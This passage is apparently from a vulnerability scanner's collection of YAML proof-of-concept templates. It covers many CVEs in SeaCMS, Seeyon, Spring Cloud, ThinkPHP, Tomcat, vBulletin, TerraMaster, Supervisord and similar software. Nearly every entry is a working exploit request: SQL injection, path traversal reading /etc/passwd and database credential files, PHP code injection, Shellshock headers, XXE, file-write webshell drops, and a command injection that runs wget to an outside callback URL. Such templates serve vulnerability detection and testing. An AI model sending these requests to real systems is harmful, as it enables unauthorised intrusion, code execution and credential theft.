13 | links: 14 | - https://edr.sangfor.com.cn/ 15 | -------------------------------------------------------------------------------- /pkg/pocs/satellian-cve-2020-7980-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-satellian-cve-2020-7980-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: >- 8 | /cgi-bin/libagent.cgi?type=J 9 | headers: 10 | Cookie: ctr_t=0; sid=123456789 11 | Content-Type: application/json 12 | body: >- 13 | {"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "expr {{r1}} + {{r2}}", "F": "EXEC_CMD"}, "V_": 1} 14 | follow_redirects: true 15 | expression: response.body.bcontains(bytes(string(r1 + r2))) 16 | detail: 17 | author: JingLing(https://hackfun.org/) 18 | Affected version: Intellian Aptus Web <= 1.24 19 | links: 20 | - https://nvd.nist.gov/vuln/detail/CVE-2020-7980 21 | -------------------------------------------------------------------------------- /pkg/pocs/seacms-before-v992-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-before-v992-rce 2 | set: 3 | r1: randomLowercase(8) 4 | rules: 5 | - method: GET 6 | path: "/comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_])%3B%3F%3E" 7 | expression: | 8 | response.status == 200 9 | - method: GET 10 | path: "/data/mysqli_error_trace.php?_=printf(md5(\"{{r1}}\"))%3B" 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(md5(r1))) 13 | detail: 14 | author: bufsnake(https://github.com/bufsnake) 15 | links: 16 | - https://www.zhihuifly.com/t/topic/3118 17 | -------------------------------------------------------------------------------- /pkg/pocs/seacms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-rce 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | r1: randomInt(800000000, 
1000000000) 5 | rules: 6 | - method: POST 7 | path: "/search.php?print({{r}}%2b{{r1}})" 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: | 11 | searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/* 12 | expression: | 13 | response.status == 200 && response.body.bcontains(bytes(string(r + r1))) 14 | detail: 15 | author: neverendxxxxxx(https://github.com/neverendxxxxxx),violin 16 | seacms: v6.55 17 | links: 18 | - https://www.jianshu.com/p/8d878330a42f 19 | -------------------------------------------------------------------------------- /pkg/pocs/seacms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-sqli 2 | rules: 3 | - method: GET 4 | path: /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27` 5 | follow_redirects: true 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"6f7c6dcbc380aac3bcba1f9fccec99") 8 | detail: 9 | author: MaxSecurity(https://github.com/MaxSecurity) 10 | links: 11 | - https://www.uedbox.com/post/54561/ 12 | -------------------------------------------------------------------------------- /pkg/pocs/seacms-v654-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-v654-rce 2 | set: 3 | rand: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: /search.php 7 | body: >- 8 | searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=prin&9[]=tf(md5({{rand}})); 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 12 | detail: 13 
| links: 14 | - http://0day5.com/archives/4249/ 15 | - https://phyb0x.github.io/2018/10/09/seacms%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90/ -------------------------------------------------------------------------------- /pkg/pocs/seacmsv645-command-exec.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacmsv645-command-exec 2 | set: 3 | rand1: randomInt(200000000, 210000000) 4 | rand2: randomInt(200000000, 210000000) 5 | rules: 6 | - method: POST 7 | path: /search.php?searchtype=5 8 | body: searchtype=5&order=}{end if} {if:1)print({{rand1}}%2b{{rand2}});if(1}{end if} 9 | expression: | 10 | response.body.bcontains(bytes(string(rand1 + rand2))) 11 | detail: 12 | author: Facker007(https://github.com/Facker007) 13 | links: 14 | - https://www.cnblogs.com/ffx1/p/12653597.html 15 | -------------------------------------------------------------------------------- /pkg/pocs/seeyon-ajax-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-ajax-unauthorized-access 2 | rules: 3 | - method: GET 4 | path: /seeyon/thirdpartyController.do.css/..;/ajax.do 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null")) 7 | - method: GET 8 | path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json") 11 | 12 | detail: 13 | author: x1n9Qi8 14 | links: 15 | - https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA 16 | - https://buaq.net/go-53721.html 17 | -------------------------------------------------------------------------------- /pkg/pocs/seeyon-cnvd-2020-62422-readfile.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-cnvd-2020-62422-readfile 2 | rules: 3 | - method: GET 4 | path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties 5 | follow_redirects: false 6 | expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password") 7 | detail: 8 | author: Aquilao(https://github.com/Aquilao) 9 | info: seeyon readfile(CNVD-2020-62422) 10 | links: 11 | - https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422 12 | -------------------------------------------------------------------------------- /pkg/pocs/seeyon-wooyun-2015-0108235-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-wooyun-2015-0108235-sqli 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /yyoa/ext/trafaxserver/downloadAtt.jsp?attach_ids=(1)%20and%201=2%20union%20select%201,2,3,4,5,md5({{rand}}),7-- 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: Rexus 11 | links: 12 | - https://bugs.shuimugan.com/bug/view?bug_no=0108235 13 | -------------------------------------------------------------------------------- /pkg/pocs/seeyon-wooyun-2015-148227.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-wooyun-2015-148227 2 | rules: 3 | - method: GET 4 | path: /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type == "application/xml" && response.body.bcontains(bytes("NCInvokerServlet")) 8 | detail: 9 | author: canc3s(https://github.com/canc3s) 10 | links: 11 | - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html 12 | 
-------------------------------------------------------------------------------- /pkg/pocs/solarwinds-cve-2020-10148.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-solarwinds-cve-2020-10148 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /web.config.i18n.ashx?l=en-US&v={{r1}} 7 | expression: | 8 | response.status == 200 && response.body.bcontains(bytes("SolarWinds.Orion.Core.Common")) && response.body.bcontains(bytes("/Orion/NetPerfMon/TemplateSiblingIconUrl")) 9 | detail: 10 | author: su(https://suzzz112113.github.io/#blog) 11 | CVE: CVE-2020-10148 12 | links: 13 | - https://kb.cert.org/vuls/id/843464 -------------------------------------------------------------------------------- /pkg/pocs/solr-cve-2017-12629-xxe.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-solr-cve-2017-12629-xxe 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | rules: 6 | - method: GET 7 | path: "/solr/admin/cores?wt=json" 8 | expression: "true" 9 | search: | 10 | "name":"(?P[^"]+)", 11 | - method: GET 12 | path: /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22{{reverseURL}}%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser 13 | follow_redirects: true 14 | expression: | 15 | reverse.wait(5) 16 | detail: 17 | author: sharecast 18 | links: 19 | - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE 20 | -------------------------------------------------------------------------------- /pkg/pocs/sonarqube-cve-2020-27986-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sonarqube-cve-2020-27986-unauth 2 | rules: 3 | - method: GET 4 | path: "/api/settings/values" 5 | expression: | 6 | response.status == 200 && 
response.body.bcontains(bytes(string(b"sonaranalyzer-cs.nuget.packageVersion"))) && response.body.bcontains(bytes(string(b"sonar.core.id"))) && response.content_type.contains("application/json") 7 | detail: 8 | author: pa55w0rd(www.pa55w0rd.online/) 9 | Affected Version: "sonarqube < 8.4.2.36762" 10 | links: 11 | - https://nvd.nist.gov/vuln/detail/CVE-2020-27986 12 | -------------------------------------------------------------------------------- /pkg/pocs/sonicwall-ssl-vpn-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sonicwall-ssl-vpn-rce 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(1140000, 1144800) 5 | rules: 6 | - method: GET 7 | path: /cgi-bin/jarrewrite.sh 8 | follow_redirects: false 9 | headers: 10 | X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}' 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) 13 | detail: 14 | author: sharecast 15 | links: 16 | - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ 17 | -------------------------------------------------------------------------------- /pkg/pocs/spark-api-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spark-api-unauth 2 | rules: 3 | - method: GET 4 | path: /v1/submissions 5 | expression: | 6 | response.status == 400 && response.body.bcontains(b"Missing an action") && response.body.bcontains(b"serverSparkVersion") 7 | detail: 8 | author: betta(https://github.com/betta-cyber) 9 | links: 10 | - https://xz.aliyun.com/t/2490 11 | -------------------------------------------------------------------------------- /pkg/pocs/spark-webui-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spark-webui-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | expression: response.status == 200 && response.body.bcontains(b"Spark") && 
response.body.bcontains(b"<strong>URL:</strong> spark:") 6 | detail: 7 | links: 8 | - https://github.com/vulhub/vulhub/tree/master/spark/unacc -------------------------------------------------------------------------------- /pkg/pocs/spring-cloud-cve-2020-5405.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-cloud-cve-2020-5405 2 | rules: 3 | - method: GET 4 | path: >- 5 | /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.body.bcontains(bytes("This file is managed by man:systemd-resolved(8). Do not edit.")) 9 | 10 | detail: 11 | version: <= 2.1.6, 2.2.1 12 | author: kingkk(https://www.kingkk.com/) 13 | links: 14 | - https://pivotal.io/security/cve-2020-5405 15 | - https://github.com/spring-cloud/spring-cloud-config -------------------------------------------------------------------------------- /pkg/pocs/spring-cloud-cve-2020-5410.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-cloud-cve-2020-5410 2 | rules: 3 | - method: GET 4 | path: >- 5 | /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a 6 | expression: | 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | author: Soveless(https://github.com/Soveless) 10 | Affected Version: "Spring Cloud Config 2.2.x < 2.2.3, 2.1.x < 2.1.9" 11 | links: 12 | - https://xz.aliyun.com/t/7877 -------------------------------------------------------------------------------- /pkg/pocs/spring-cve-2016-4977.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-cve-2016-4977 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: GET 7 | path: 
/oauth/authorize?response_type=${{{r1}}*{{r2}}}&client_id=acme&scope=openid&redirect_uri=http://test 8 | follow_redirects: false 9 | expression: > 10 | response.body.bcontains(bytes(string(r1 * r2))) 11 | detail: 12 | Affected Version: "spring(2.0.0-2.0.9 1.0.0-1.0.5)" 13 | author: hanxiansheng26(https://github.com/hanxiansheng26) 14 | links: 15 | - https://github.com/vulhub/vulhub/tree/master/spring/CVE-2016-4977 16 | -------------------------------------------------------------------------------- /pkg/pocs/springboot-env-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-springboot-env-unauth 2 | groups: 3 | spring1: 4 | - method: GET 5 | path: /env 6 | expression: | 7 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") 8 | spring2: 9 | - method: GET 10 | path: /actuator/env 11 | expression: | 12 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") 13 | detail: 14 | links: 15 | - https://github.com/LandGrey/SpringBootVulExploit 16 | -------------------------------------------------------------------------------- /pkg/pocs/springcloud-cve-2019-3799.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-springcloud-cve-2019-3799 2 | rules: 3 | - method: GET 4 | path: >- 5 | /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 9 | 10 | detail: 11 | version: <2.1.2, 2.0.4, 1.4.6 12 | author: Loneyer 13 | links: 14 | - https://github.com/Loneyers/vuldocker/tree/master/spring/CVE-2019-3799 15 | -------------------------------------------------------------------------------- /pkg/pocs/supervisord-cve-2017-11610.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-supervisord-cve-2017-11610 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | rules: 6 | - method: POST 7 | path: /RPC2 8 | body: >- 9 | <?xml version="1.0"?> 10 | <methodCall> 11 | <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName> 12 | <params> 13 | <param> 14 | <string>wget {{reverseURL}}</string> 15 | </param> 16 | </params> 17 | </methodCall> 18 | follow_redirects: false 19 | expression: | 20 | response.status == 200 && reverse.wait(5) 21 | detail: 22 | author: Loneyer 23 | links: 24 | - https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610 25 | -------------------------------------------------------------------------------- /pkg/pocs/tensorboard-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tensorboard-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | follow_redirects: true 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"The TensorFlow Authors. 
All Rights Reserved.") 8 | - method: GET 9 | path: '/data/plugins_listing' 10 | follow_redirects: true 11 | expression: | 12 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"profile") && response.body.bcontains(b"distributions") 13 | detail: 14 | author: p0wd3r 15 | links: 16 | - https://www.tensorflow.org/guide/summaries_and_tensorboard?hl=zh-CN 17 | -------------------------------------------------------------------------------- /pkg/pocs/terramaster-cve-2020-15568.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-terramaster-cve-2020-15568 2 | set: 3 | r1: randomLowercase(10) 4 | rules: 5 | - method: GET 6 | path: /include/exportUser.php?type=3&cla=application&func=_exec&opt=(id;whoami)%3E{{r1}} 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 10 | - method: GET 11 | path: /include/{{r1}} 12 | expression: | 13 | response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"gid") && response.body.bcontains(b"root") # NOTE(review): the first request leaves /include/{{r1}} (the "id;whoami" output) on the target and nothing deletes it; remove it after a positive result. 14 | detail: 15 | author: albertchang 16 | Affected Version: "TOS version 4.1.24 and below" 17 | links: 18 | - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/ 19 | -------------------------------------------------------------------------------- /pkg/pocs/terramaster-cve-2020-28188-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-terramaster-cve-2020-28188-rce 2 | set: 3 | r2: randomLowercase(10) 4 | rules: 5 | - method: GET 6 | path: /include/makecvs.php?Event=http|echo%20"<?php%20echo%20md5({{r2}});unlink(__FILE__);?>"%20>>%20/usr/www/{{r2}}.php%20&&%20chmod%20755%20/usr/www/{{r2}}.php|| 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.content_type.contains("text/csv") && response.body.bcontains(bytes("Service,DateTime")) 10 | - method: GET 11 | path: /{{r2}}.php 
12 | follow_redirects: false 13 | expression: | 14 | response.status == 200 && response.body.bcontains(bytes(md5(r2))) 15 | detail: 16 | author: 1au 17 | links: 18 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202012-1548 19 | -------------------------------------------------------------------------------- /pkg/pocs/thinkadmin-v6-readfile.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkadmin-v6-readfile 2 | rules: 3 | - method: GET 4 | path: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34 5 | follow_redirects: true 6 | expression: | 7 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes("PD9waH")) && response.body.bcontains(bytes("VGhpbmtBZG1pbg")) 8 | detail: 9 | author: 0x_zmz(github.com/0x-zmz) 10 | info: thinkadmin-v6-readfile By 0x_zmz 11 | links: 12 | - https://mp.weixin.qq.com/s/3t7r7FCirDEAsXcf2QMomw 13 | - https://github.com/0x-zmz 14 | -------------------------------------------------------------------------------- /pkg/pocs/thinkcmf-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkcmf-lfi 2 | 3 | rules: 4 | - method: GET 5 | path: "/?a=display&templateFile=README.md" 6 | expression: | 7 | response.status == 200 && response.body.bcontains(bytes(string(b"ThinkCMF"))) && response.body.bcontains(bytes(string(b"## README"))) 8 | 9 | detail: 10 | author: JerryKing 11 | ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2 12 | links: 13 | - https://www.freebuf.com/vuls/217586.html 14 | -------------------------------------------------------------------------------- /pkg/pocs/thinkcmf-write-shell.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkcmf-write-shell # NOTE(review): this POC writes /{{r}}.php to the web root and never removes it; delete the file after a positive result. 2 | set: 3 | r: randomInt(10000, 20000) 4 | r1: randomInt(1000000000, 2000000000) 5 | rules: 6 | - method: GET 7 | path: 
"/index.php?a=fetch&content=%3C?php+file_put_contents(%22{{r}}.php%22,%22%3C?php+echo+{{r1}}%3B%22)%3B" 8 | expression: "true" 9 | - method: GET 10 | path: "/{{r}}.php" 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1))) 13 | 14 | detail: 15 | author: violin 16 | ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2 17 | links: 18 | - https://www.freebuf.com/vuls/217586.html 19 | -------------------------------------------------------------------------------- /pkg/pocs/thinkphp-v6-file-write.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp-v6-file-write 2 | set: 3 | f1: randomInt(800000000, 900000000) 4 | rules: 5 | - method: GET 6 | path: /{{f1}}.php 7 | follow_redirects: true 8 | expression: | 9 | response.status == 404 10 | - method: GET 11 | path: / 12 | headers: 13 | Cookie: PHPSESSID=../../../../public/{{f1}}.php 14 | follow_redirects: true 15 | expression: | 16 | response.status == 200 && "set-cookie" in response.headers && response.headers["set-cookie"].contains(string(f1)) 17 | - method: GET 18 | path: /{{f1}}.php 19 | follow_redirects: true 20 | expression: | 21 | response.status == 200 && response.content_type.contains("text/html") 22 | detail: 23 | author: Loneyer 24 | Affected Version: "Thinkphp 6.0.0" 25 | links: 26 | - https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write 27 | -------------------------------------------------------------------------------- /pkg/pocs/thinkphp5-controller-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp5-controller-rce 2 | rules: 3 | - method: GET 4 | path: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91 5 | expression: | 6 | response.body.bcontains(b"a29hbHIgaXMg%d2F0Y2hpbmcgeW9129") 7 | 8 | detail: 9 | links: 10 | - 
https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce -------------------------------------------------------------------------------- /pkg/pocs/thinkphp5023-method-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp5023-method-rce 2 | rules: 3 | - method: POST 4 | path: /index.php?s=captcha 5 | headers: 6 | Content-Type: application/x-www-form-urlencoded 7 | body: | 8 | _method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu&get[]=1 9 | expression: | 10 | response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu1") 11 | detail: 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce -------------------------------------------------------------------------------- /pkg/pocs/tomcat-cve-2017-12615-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tomcat-cve-2017-12615-rce 2 | set: 3 | filename: randomLowercase(6) 4 | verifyStr: randomLowercase(12) 5 | commentStr: randomLowercase(12) # NOTE(review): the PUT below leaves /{{filename}}.jsp on the server and nothing deletes it; remove it after a positive result. 6 | rules: 7 | - method: PUT 8 | path: '/{{filename}}.jsp/' 9 | body: '{{verifyStr}} <%-- {{commentStr}} --%>' 10 | follow_redirects: false 11 | expression: | 12 | response.status == 201 13 | - method: GET 14 | path: '/{{filename}}.jsp' 15 | follow_redirects: false 16 | expression: | 17 | response.status == 200 && response.body.bcontains(bytes(verifyStr)) && !response.body.bcontains(bytes(commentStr)) 18 | detail: 19 | author: j4ckzh0u(https://github.com/j4ckzh0u) 20 | links: 21 | - https://www.seebug.org/vuldb/ssvid-96562 22 | - https://mp.weixin.qq.com/s/sulJSg0Ru138oASiI5cYAA 23 | -------------------------------------------------------------------------------- /pkg/pocs/tomcat-cve-2018-11759.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tomcat-cve-2018-11759 2 | rules: 3 | - 
method: GET 4 | path: /jkstatus; 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "JK Status Manager".bmatches(response.body) && "Listing Load Balancing Worker".bmatches(response.body) 8 | - method: GET 9 | path: /jkstatus;?cmd=dump 10 | follow_redirects: false 11 | expression: | 12 | response.status == 200 && "ServerRoot=*".bmatches(response.body) 13 | detail: 14 | author: loneyer 15 | links: 16 | - https://github.com/immunIT/CVE-2018-11759 17 | -------------------------------------------------------------------------------- /pkg/pocs/tongda-meeting-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tongda-meeting-unauthorized-access 2 | rules: 3 | - method: GET 4 | path: >- 5 | /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay 6 | headers: 7 | User-Agent: 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36' 8 | Accept-Encoding: 'deflate' 9 | follow_redirects: false 10 | expression: | 11 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes(string("creator"))) && response.body.bcontains(bytes(string("originalTitle"))) 12 | detail: 13 | author: 清风明月(www.secbook.info) 14 | influence_version: ' < 通达OA 11.5' 15 | links: 16 | - https://mp.weixin.qq.com/s/3bI7v-hv4rMUnCIT0GLkJA 17 | -------------------------------------------------------------------------------- /pkg/pocs/tpshop-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tpshop-sqli 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /mobile/index/index2/id/1) and (select 1 from (select count(*),concat(0x716b627671,(select md5({{r}})),0x716b627671,floor(rand(0)*2))x from information_schema.tables group by x)a)-- 8 | follow_redirects: true 9 | expression: | 10 | 
response.body.bcontains(bytes(md5(string(r)))) 11 | detail: 12 | author: hanxiansheng26(https://github.com/hanxiansheng26) 13 | Affected Version: "tpshop<3.0" 14 | links: 15 | - https://xz.aliyun.com/t/6635 -------------------------------------------------------------------------------- /pkg/pocs/ueditor-cnvd-2017-20077-file-upload.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ueditor-cnvd-2017-20077-file-upload 2 | rules: 3 | - method: GET 4 | path: /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 5 | headers: 6 | Accept-Encoding: 'deflate' 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string("没有指定抓取源"))) 10 | detail: 11 | author: 清风明月(www.secbook.info) 12 | influence_version: 'UEditor v1.4.3.3' 13 | links: 14 | - https://zhuanlan.zhihu.com/p/85265552 15 | - https://www.freebuf.com/vuls/181814.html 16 | exploit: >- 17 | http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8 18 | -------------------------------------------------------------------------------- /pkg/pocs/uwsgi-cve-2018-7490.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-uwsgi-cve-2018-7490 2 | rules: 3 | - method: GET 4 | path: /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | links: 10 | - https://github.com/vulhub/vulhub/tree/master/uwsgi/CVE-2018-7490 -------------------------------------------------------------------------------- /pkg/pocs/vbulletin-cve-2019-16759-bypass.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vbulletin-cve-2019-16759-bypass 2 | set: 3 | f1: randomInt(800000000, 900000000) 4 | rules: 5 | - method: POST 6 | path: 
/ajax/render/widget_tabbedcontainer_tab_panel 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: >- 10 | subWidgets[0][template]=widget_php&subWidgets[0][config][code]=var_dump(md5({{f1}})); 11 | follow_redirects: true 12 | expression: | 13 | response.status == 200 && response.body.bcontains(bytes(substr(md5(string(f1)), 0, 31))) && response.content_type.contains("application/json") 14 | detail: 15 | author: Loneyer 16 | links: 17 | - https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ 18 | -------------------------------------------------------------------------------- /pkg/pocs/vbulletin-cve-2019-16759.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vbulletin-cve-2019-16759 2 | set: 3 | rand: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: / 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: >- 10 | routestring=ajax/render/widget_php&widgetConfig%5bcode%5d=print(md5({{rand}}))%3bexit%3b 11 | follow_redirects: true 12 | expression: | 13 | response.body.bcontains(bytes(md5(string(rand)))) 14 | detail: 15 | author: JingLing(https://hackfun.org/) 16 | vbulletion_version: 5.0.0 - 5.5.4 17 | links: 18 | - https://securityaffairs.co/wordpress/91689/hacking/unpatched-critical-0-day-vbulletin.html 19 | - https://xz.aliyun.com/t/6419 20 | -------------------------------------------------------------------------------- /pkg/pocs/vmware-vcenter-arbitrary-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vmware-vcenter-arbitrary-file-read 2 | groups: 3 | win: 4 | - method: GET 5 | path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"org.postgresql.Driver") 9 | linux: 10 | - method: GET 11 | path: /eam/vib?id=/etc/passwd 12 | 
follow_redirects: false 13 | expression: | 14 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 15 | detail: 16 | author: MrP01ntSun(https://github.com/MrPointSun) 17 | links: 18 | - https://t.co/LfvbyBUhF5 19 | -------------------------------------------------------------------------------- /pkg/pocs/weaver-ebridge-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weaver-ebridge-file-read 2 | groups: 3 | linux: 4 | - method: GET 5 | path: "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt" 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id") 9 | search: | 10 | \"id\"\:\"(?P<var>.+?)\"\, 11 | - method: GET 12 | path: "/file/fileNoLogin/{{var}}" 13 | follow_redirects: false 14 | expression: | 15 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 16 | 17 | windows: 18 | - method: GET 19 | path: 